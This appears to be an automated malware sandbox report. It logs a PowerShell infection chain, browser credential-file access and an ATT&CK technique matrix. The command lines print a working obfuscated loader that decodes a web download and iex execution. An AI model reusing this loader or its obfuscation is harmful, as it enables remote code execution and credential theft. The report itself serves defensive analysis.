          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$claJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$claJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match | File source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (the number in front of a technique is the report's signature-count badge; cells without a number are unmatched matrix entries):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
